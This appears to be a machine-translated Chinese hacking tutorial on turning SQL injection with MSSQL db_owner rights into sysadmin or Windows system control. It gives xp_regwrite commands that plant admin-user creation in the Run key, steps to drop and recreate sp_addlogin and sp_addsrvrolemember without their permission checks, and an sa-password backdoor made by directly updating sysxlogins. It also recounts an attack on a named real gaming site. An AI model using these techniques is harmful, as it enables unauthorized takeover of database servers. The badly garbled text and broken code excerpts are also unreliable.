SQL Injection Script Injection ultimate exploitation method

Disclaimer: This article is only for teaching purposes. I am not responsible for the consequences of attacks caused by this article. Because it is found that the harm is too large, the original text has been greatly deleted and modified, even if this article is still very harmful, please do not do any destructive operations on the domestic site.

I decided to send it again and again. This method is widely used. It can be said that a website with SQL injection vulnerabilities can obtain webshell or even system permissions (dare not
When I talk about it all the time, the actual "practice exercises" of hundreds of people can basically get webshell or even system permissions for 100% of them ).
I remember that I wrote a method to use xp_regwrite to obtain system permissions in MSSQL db_owner role injection to directly obtain system permissions (continued:

Xp_regwrite
'HKEY _ LOCAL_MACHINE ', 'softwaremicrosoftwindowscurrentvers ionun', 'x
Wq1 ', 'reg _ SZ', 'net user xwq/add'
Xp_regwrite
'HKEY _ LOCAL_MACHINE ', 'softwaremicrosoftwindowscurrentvers ionun', 'x

 

Wq2 ', 'reg _ SZ', 'net localgroup administrators xwq/add', as long as the website is located
To obtain system permissions. After hundreds of real experiments, this method is not
It is too practical and easy to attract the attention of network management. Besides, ddos is also a violation (even good guys ).
It takes a lot of manpower and material resources to launch a ddos attack (depending on how many bots you pull ). So it is not feasible (
Unless it is a website that you really want to fix ).
Haha, there are so many Dorado pulls that you may be impatient with. Well, this will introduce my three major
One of the things that must be killed-the omnipotent Elevation of Privilege.
If a website has the SQL injection vulnerability, if the website uses the fixed server sysadmin permission
Limited User connections (HA, in plain words, sa, cainiao can think so ).
It can be said that a webshell or system permission is easy and easy. As far as I know,
Sysadmin permissions require no more than 10 webshell or system permissions.
10). How does sysadmin get webshell or system permissions?
I am familiar with it, but what if a website has the db_owner permission? What do you do, how do you get the system
General permission, how to get webshell (no Upload Vulnerability, database backup, and other functions), you may say back
Backup a shell. I remember that LCX also directly obtains system permissions in MSSQL db_owner role injection.
It is said that pulling "the shell backed up is just a theoretical stuff. If a webshell has 20 mb,
Can you still use it ?" Well, if I tell you that db_owner has a webshell or system permission
Limits are as much as sysadmin permissions. Do you think it is incredible?
Or am I talking nonsense? (Don't read the following content if you don't trust your friends)
Well, I don't want to talk about it.
I will tell you one of my three key technologies-the omnipotent methods for elevation of permissions.
Before telling everyone, let's do an experiment first.
In the tutorial environment Windows XP sp1 + SQL 2000 sp3, you can follow me to step, first new
Create a user with db_owner permissions. Here I am xwq (that is, everything in the server role)
Do not select, hook db_owner in the database role), okay, now we open the query analyzer and use xwq
Enter sp_addlogin xuwenqiang in the connection, and then execute the command to check what is pulled?

Server: Message 2571, Level 14, status 2, process sp_addlogin, Row 16
User 'xwq' has no permission to run DBCC auditevent.
Server: Message 15247, level 16, status 1, process sp_addlogin, Row 17
You are not authorized to perform this operation.

The error message above is normal, because only sysadmin and securityadmin are supported.
Only members of the server role can execute sp_addlogin.
What is used? Here, let's take a look at the code of sp_addlogin:

Create procedure sp_addlogin
@ Loginame sysname
, @ Passwd sysname = Null
, @ Defdb; sysname = 'master' -- UNDONE: DEFAULT
Retriable ???
, @ Deflanguage sysname = Null
, @ Sid varbinary (16) = Null
, @ Encryptopt varchar (20) = Null
End
ELSE
Begin
Dbcc auditevent (104, 1, 1, @ loginame, NULL, NULL, @ sid)
End

 

As long as we delete this code, users with any permissions can add users. Okay, let's delete sp_addlogin and drop procedure sp_addlogin.
Then restore sp_addlogin.

In this way, I can add any user to the xwq with db_owner permission. OK. In the query analyzer, enter sp_addlogin xuwenqiang and execute the command. GOOD! A new logon has been created.
I create a new user, xuwenqiang. Of course, this user is not created in white. I want to change it to a user with the highest permissions. in SQL, sysadmin is the user with the highest permissions, change a user
Sysadmin only pulls the stored procedure sp_addsrvrolemember, but only users with sysadmin permissions can use it. It's annoying. I want him to use it for me.
Let me only have the db_owner permission, how to use sp_addsrvrolemember to pull, that's right, just remove the permission restriction in sp_addsrvrolemember, just like the method used to make sp_addlogin
In this section, we can add sysadmin pull at will. Let's first look at the code of sp_addsrvrolemember:

@ Loginame sysname, -- login name
@ Rolename sysname = NULL -- server role name
As
-- Setup runtime options/declare variables --
Set nocount on
Declare @ ret int, -- return value of sp call
@ Rolebit smallint, NULL, @ rolename,
NULL)
Raiserror (15247,-1,-1)
Return (1)
End
-- Audit a successful security check --
Dbcc auditevent (108, 1, 1, @ loginame, NULL, @ rolename, NULL)
-- Cannot change sa roles --
If @ loginame = 'sa'
Begin
Raiserror (15405,-1,-1, @ loginame)
Return (1)
End
-- Obtain the bit for this role --
Select @ rolebit = CASE @ rolename
WHEN 'sysadmin' THEN 16
WHEN 'securityadmin' THEN 32
WHEN 'serveradmin' THEN 64
WHEN 'setupadmin' THEN 128
WHEN 'processadmin' THEN 256
 
Delete this section -- validate server role name, checking permissions --
Select @ ismem = is_srvrolemember (@ rolename)
If @ ismem is null
Begin
Dbcc auditevent (108, 1, 0, @ loginame, NULL, @ rolename,
NULL)
Raiserror (15402,-1,-1, @ rolename)
Return (1)
End
If @ ismem = 0
Begin
Dbcc auditevent (108, 1, 0, @ loginame, NULL, @ rolename,
NULL)
Raiserror (15247,-1,-1)
Return (1)
End

In this way, sysadmin can be added as needed. In the query analyzer, enter
Sp_addsrvrolemember xuwenqiang, sysadmin, Yeah !!!!!!! Pulled successfully. Here we will
A user with only the db_owner permission is successfully pulled to create a user with the highest permission in SQL.
That is, xuwenqiang, a user with sysadmin permissions, wants webshell or
Is the system permission of the attacker not easy yet! Do not just put your eyes on the sp_addlogin and
Sp_addsrvrolemember: any stored procedure that can only be used by sysadmin
We can use all of the technologies that make use of My omnipotent Privilege Escalation capabilities. For example: sp-
Configure, sp_addmediaserver, sp_addjavassrvlogin, sp_makewebtask, etc.
We can use the sysadmin permissions for them.
Next we will give an example of 10 thousand privilege escalation.
Work with me to create a perfect backdoor that will never be killed
We all know that there is a user called a backdoor in SQL, that is, sa, which is a built-in Administrator.
Login, and cannot be changed or deleted. Well, this is what M $ said. If you read another one I wrote
In this article, "completely delete the sa backdoor", you will know that sa is also well deleted. We know that in SQL
Sp_password is used to change the password. However, we must know the old password of the user to change.
Can I change the sa password without knowing the old password? Yes, actually
That is, sp_configure is used to display or change the global configuration of the current server.
Configuration. The execution permission of sp_configure (used to change configuration options) is granted to sysadmin by default.
And serveradmin fixed server roles. It is easy to check one of the permissions in sp_configure.
Segment deletion, and re-build, we can use pull.
 
OK, let's try again
Sp_configure 'Allow updates', 1
Go
RECONFIGURE WITH OVERRIDE
Go
So that we can change the sa password. Then update sysxlogins set
Password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A 1FC944AA50C
BB30267F53B9451B7189CA67AF19A1FC where sid = 0x01, so that the sa password is changed.
Pull 111111. The solution is to delete sa ., For how to delete a file, see my
Delete all the backdoors of sa.
 
Instance:
Next, we will conduct a goodwill attack test on a well-known website in China to give a rough verification of the above knowledge. For the reasons of influence and many other factors, we call this site www. ** 173.com. Www. ** the site 173.com is very famous in the game and ranks the top 20 (I tested it at the time). Here I don't want to talk about how I found the injection point. You can also look for it, it's still a lot of time (the whole test really took me a lot of time, don't get me wrong, I'm not saying that the time is spent on "Detection", but it's all pulled in the Write Program, if I don't write a decent program, how can I do what I want? The attack takes less than 10 minutes ).
The injection point gametype = ** (depressing, it may be easier if there was nbsi2.) enter drop procedure sp_addlogin first, then input it in IE (Oh, of course I typed it in the program I wrote)
Then exec master .. sp_addsrvrolemember xwq, sysadmin. Let's take a look at the integrated SQL utilization tool or query analyzer. ** pull a server with the highest permissions on 17173.com